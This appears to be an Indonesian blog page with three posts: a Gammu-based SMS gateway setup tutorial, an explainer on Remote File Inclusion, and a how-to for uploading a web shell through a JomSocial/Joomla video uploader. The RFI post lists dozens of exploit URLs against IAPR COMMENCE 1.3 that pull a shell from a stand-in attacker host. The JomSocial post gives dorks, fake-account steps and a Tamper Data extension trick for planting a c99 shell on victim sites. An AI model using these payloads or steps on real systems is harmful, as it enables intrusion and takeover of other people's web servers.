SMS Gateway

Selasa, 24 Juli 2012

maaf ya kalo tutorialnya agak berantakan, ga pandai nulis soalnya.. hehehe
kali ini ane mau belajar bikin tutorial membangun sms gateway. . sms gateway?? ane juga kurang ngerti artinya apaan. ane lagi iseng2 aja nyari cara buat smsan dengan menggunakan modem usb di linux. ga taunya malah nemu ginian.. kalo kata orang dengan sms gateway kita bisa nampung ribuan sms dikotak masuk kita dengan mengandalkan database mysql..
langsung saja yak..

pertama2 kita harus menginstal bumbu yang diperlukannya dlu. .

1. Install Apache2nya dlu. .

# sudo apt-get install apache2 apache2.2-common apache2-doc apache2-mpm-prefork apache2-utils

2. abis itu install PHP'a dlu. .

# sudo apt-get install libapache2-mod-perl2 mysql-server-5.1 libapache2-mod-php5 php5-cgi php5-curl php5-gd php5-mysql php-pear

3. kalo udah truz install mysql'a. .

# sudo apt-get install mysql-server mysql-client

4. nah, sekarang install phpmyadminnya dlu..

# sudo apt-get install phpmyadmin

5. terakhir kita tinggal install gammu untuk tool smsannya..

kita tambahkan dlu repo untuk menginstall gammunya,,

# sudo gedit /etc/apt/sources.list

tambahkan baris berikut. .

# deb http://repo.ugm.ac.id/ppa.launchpad.net/gammu lucid main

truz download gpg key gammunya..

# sudo wget ftp://repo.ugm.ac.id/ekstra/.ugos_tools/key_gammu

tambahin gpg key ke dalem system. .

#  sudo apt-key add key_gammu

nah, sekarang baru install gammu dan librarynya..

# sudo apt-get install gammu gammu-smsd libgammu7 libgsmsd7

oke, sekarang kita lihat port device yang digunakan oleh modem..

# sudo dmesg | grep tty*
[ 1530.136567] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB0
[ 1530.137077] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB1
[ 1530.137533] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB2 [ 1530.138024] usb 4-2: GSM modem (1-port) converter now attached to ttyUSB3

nah sekarang kita konfigurasi gammunya. .

# sudo gammu-config

nnt bakal muncul form buat settingannya, isi dengan variabel seperti dibawah dan pilih Save. .

port = /dev/ttyUSB1 # disesuaikan
connection = at115200 # disesuaikan
synchronizetime = yes
logfile = /etc/gammulog
logformat = textall use_locking = # isi yes jika ingin resource modem di kunci

perintah di atas bakal nyimpen konfigura di /root/.gammurc sekarang konfigurasi file /etc/gammu-smsdrc:

# sudo gedit /etc/gammu-smsdrc  
[gammu]
port = /dev/ttyUSB1 # disesuaikan dgn yang tadi connection = at115200 # disesuaikan dgn yang tadi

[smsd]
service = sql
driver = native_mysql
DeliveryReport =sms
logfile = /etc/smsdlog debuglevel = 1 # change to 255 if you want to debug

User = root # disesuaikan
password = root # disesuaikan
pc = localhost database = gammu

sekarang kita cek identify modemnya..

# sudo gammu --identify
Manufacturer : Manufacturer
Model : unknown (HSPA USB MODEM)
Firmware : LQA0094.1.2_MG32
IMEI : 352161046194464
SIM IMSI : 510080306788834

sekarang kita buat database mysql'a untuk nampung sms2 kita..
masuk kedirectory /usr/share/doc/gammu/examples/sql

# cd /usr/share/doc/gammu/examples/sql
truz masuk ke mysql'a dan buat databasenya..

# mysql -u root -p
Enter password: (masukkan password mysql kita)

# mysql> create database gammu;
Query OK, 1 row affected (0.01 sec)

# mysql> exit
Bye

# mysql -u root -p gammu < mysql.sql
Enter password:

# mysql> show databases;

+--------------------+
| Database |
+--------------------+
| information_schema |
| db_albalonns |
| gammu |
| kalkun |
| mysql |
| phpmyadmin |
+--------------------+
6 rows in set (0.00 sec)

# mysql> use gammu;
Database changed

# mysql> show tables;
+------------------+
| Tables_in_gammu |
+------------------+
| daemons |
| gammu |
| inbox |
| outbox |
| outbox_multipart |
| pbk |
| pbk_groups |
| phones |
| sentitems |
+------------------+
9 rows in set (0.00 sec)

# mysql> exit
Bye

oke sekarang kita coba sms janda yang buahenol yuk. .

# sudo gammu --sendsms text 021xxxxxxx
# sudo: unable to resolve host lovelucy
# Enter message text and press ^D:
# Halo tante, godain kita2 donk. . If you want break, press Ctrl+C...
# Sending SMS 1/1....waiting for network answer..OK, message
# reference=19
# albalonns@lovelucy:~$

kalo mau cek pulsa (contoh:simpati). .

# sudo gammu --getussd *888#
Press Ctrl+C to break...
USSD received Status : No action needed Service reply : “Sisa Pulsa Anda Rp.50,00. Penggunaan pulsa di periode ini Rp.00,00. Aktif s.d. 14/05/2011. Cari t4 menarik dsekitarmu dgn TelkomselLacak. Hub *123*55#”

Setelah itu, jalankan service gammu-smsd untuk aplikasi kalkun..

# sudo /etc/init.d/gammu-smsd start

oke, cukup segini dlu yak.. sebetulnya kita bisa explore lg dengan menginstall kalkun agar mempermudah untuk mengirim sms dan mengecek kotak masuk dan kotak terkirim kita. namun ane masih belum berhasil menampilkan isi database dari kotak masuk ke kalkunnya, masih coba2 lagi.. maklum ane cuma belajar dari mbah google dan para master yang baik hati.. mungkin kalo ada yang bisa, tolong di share yak om. . hehehehe..

Remote File Inclusion

Mungkin bagi sebagian teman-teman bertanya-tanya apa sih Remote File Inclusion itu? Bagi sebagian teman-teman yang biasa bergelut dengan komputer security pasti telah sering mendengar apa yang disebut dengan Remote File Inclusion atau biasa disingkat dengan RFI. Remote File Inclusion adalah sebuah bentuk serangan secara remote yang memanfaatkan kelemahan script pada suatu halaman website karena tidak tersanitasi dengan baik, dengan cara menyisipkan script lain untuk exploitasi,

Tehnik ini sendiri mengharuskan webserver yang bersangkutan mampu menjalankan server side scripting (PHP, ASP, etc) serta file yang disisipi dibuat menggunakan bahasa script tersebut. Target remote file inclusion biasanya berbentuk sebuah portal atau content management system (CMS) sehingga banyak sekali jumlah website yang rawan terhadap serangan tipe ini.
MENGAPA BISA TERJADI?
———————-
Sebuah serangan Remote File Inclusion terjadi berdasarkan pada kesalahan atau ketidaksengajaan pendeklarasian variabel-variabel dalam sebuah file. Sebuah variabel yang tidak dideklarasikan atau didefinisikan secara benar dapat di eksploitasi. Syarat terjadinya injeksi sendiri terdiri dari:
1. Variabel yang tidak dideklarasikan dengan benar (unsanitized variables)
Variabel dalam PHP mempunyai sintaks:
include ($namavariable. “/file…”)
require_once ($namavariable. /file…)
include_once ($variable. /file…)
Misalnya kita memiliki sebuah file bernama jscript.php dan didalamnya terdapat variabel
seperti ini:

include($my_ms[”root”].’/error.php’);

Variabel tersebut memiliki kemungkinan untuk disisipi file dari luar webserver dengan eksploit
script PHP Incetion:
http://www.target.com/[Script
Path]/jscript.php?my_ms[root]=http://www.injek-pake-kaki.com/script?
2. Setting dalam file PHP.ini
register_globals=On
magic_quotes=off
allow_fopenurl=on
CONTOH SERANGAN DENGAN MENGGUNAKAN TEKNIK RFI
———————————————
Pada kesempatan kali ini penulis akan memberikan sebuah contoh penyerangan dengan menggunakan teknik Remote File Inclusion. Yang akan penulis jadikan target pada contoh kali ini adalah IAPR COMMENCE Versi 1.3. Pada IAPR COMMENCE Versi 1.3 ini banyak sekali halaman yang tidak terfilter dengan baik sehingga bisa dimanfaatkan oleh penyerang untuk melakukan serangan dengan menggunakan teknik Multiple Remote File Inclusion. Halaman-halaman beserta exploitasinya sebagai berikut :
http://target.com/Commence/includes/
db_connect.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
main_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
output_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/
user_authen_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/admin/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
page.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/includes/
include_all_fns.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/includes/page_includes/
pagebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase1.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase2.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase3.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phase4.php?privilege_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/reviewer/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
include_all_phase.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase1.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase2.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase3.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phase4.php?php_root_path=http://penyerang.com/shell.txt?
http://target.com/Commence/user/phase/
phasebase.php?php_root_path=http://penyerang.com/shell.txt?
TINGKAT BAHAYA
————–
Serangan Remote File inclusion memiliki level resiko tinggi (High Risk) bahkan level sangat berbahaya (Very Dangerous) karena injeksi memperkenankan pelakunya untuk melakukan eksekusi perintah jarak jauh (Remote Commands Execution) terhadap server. Tindakan ini sangat membahayakan bagi sebuah server jika pelakunya mencoba untuk mendapatkan hak akses lebih tinggi dengan cara melakukan eksploitasi lokal, sehingga bisa saja pelaku mendapatkan akses administrator atau root.
APA YANG HARUS DILAKUKAN
————————-
Banyak sekali portal dan komunitas white hat yang sering merilis bugs terbaru seputar injeksi. Cara paling aman adalah selalu memperhatikan perkembangan yang mereka lakukan sehingga anda dapat melakukan sedikit perbaikan yang berarti terhadap CMS yang mungkin sekarang anda gunakan. Selalu perhatikan raw log yang biasanya terdapat pada layanan hosting anda. Jika terdapat fetching yang agak menyimpang seperti GET /index.php?page=http://www.injek-pake-kaki.net/cmd? anda wajib curiga, karena bisa saja ini serangan terhadap web atau portal yang anda kelola.Salah satu tehnik paling aman bagi seorang administrator adalah selalu memperhatikan usaha-usaha infiltrasi dan usaha eksploitasi lokal.
Artikel diatas penulis tulis berdasarkan pengetahuan yang penulis miliki, apabila terdapat kesalahan dimohon masukan dan pencerahannya.
Referensi:
http://www.milw0rm.com

JomSocial ~ Joomla Shell Upload Vulnerability

Barang yang Anda butuhkan:
Firefox
Shell Sebuah
tamper Data
rentan Situs
& Otak :)

persiapan:
1. Dapatkan shell sini. (merekomendasikan: c99.php)
2. Ambil Tamper Data
3. Cari situs vuln. * lihat Dorking *

dorks:
inurl :/ com_community /
inurl :/ images / originalvideos /
inurl :/ index.php? option = com_community & view = video

Mempersiapkan Shell Anda:
1. Ambil shell.
2. Masukkan ke dalam folder (ex. "myshell")
3. Salin shell ke folder yang sama dan nama ke "yourshell.php.flv"
4. Sekarang dalam folder Anda memiliki 2 file, "myshell.php" & "myshell.php.flv".

Mendapatkan akses ke situs:
1. Mendaftarkan account palsu.
2. Aktif account palsu Anda.
3. Pergi ke halaman profil Anda.
4. Klik Add Video.
5. Pilih meng-upload video dari komputer.

Meng-upload Shell Anda:
Upload video dari komputer Anda, perlu diketahui bahwa jika Anda hanya melihat Tambahkan video dari URL yang berarti situs tersebut tidak vuln.
Alasan karena telah menciptakan sebuah file yang bernama "myshell.php.flv", adalah untuk mengelabui uploader dengan berpikir bahwa Anda meng-upload file FLV.

Meng-upload shell:
1. Pergi ke halaman upload, klik pada video add.
2. Pilih Tambah video.
3. Pilih Upload dari Komputer.
4. Browse untuk Anda "myshell.php.flv".
5. Masukan Judul.
** sebelum Anda klik meng-upload **
6. Firefox -> Tools -> Tamper Data, klik pada Tamper Data Start.
7. Sekarang klik UPLOAD.
8. Data tamper akan menunjukkan jika Anda ingin mengutak-atik, hapus centang terus mengutak-atik kemudian klik pada tamper.
9. Cari "myshell.php.flv" kemudian hapus flv makna. Bagian Anda akan memiliki "myshell.php" kiri.
10. SUBMIT.
11. Tunggu, dan anda akan melihat halaman upload sukses.
12. Congrats Anda telah meng-upload shell.

Shell lokasi:
1. Pergi ke http:// [budak] / images / originalvideos /
2. Di sana Anda akan menemukan folder bernama dalam jumlah. (Anda kemungkinan besar folder terakhir / bawah)
3. Sebagian besar akan berisi folder flv,.. && Avi dll dll
4. Folder Anda akan berisi nama yang dihasilkan acak dengan ekstensi file PHP.
5. Buka "random.php" Anda
6. Dan IN Anda!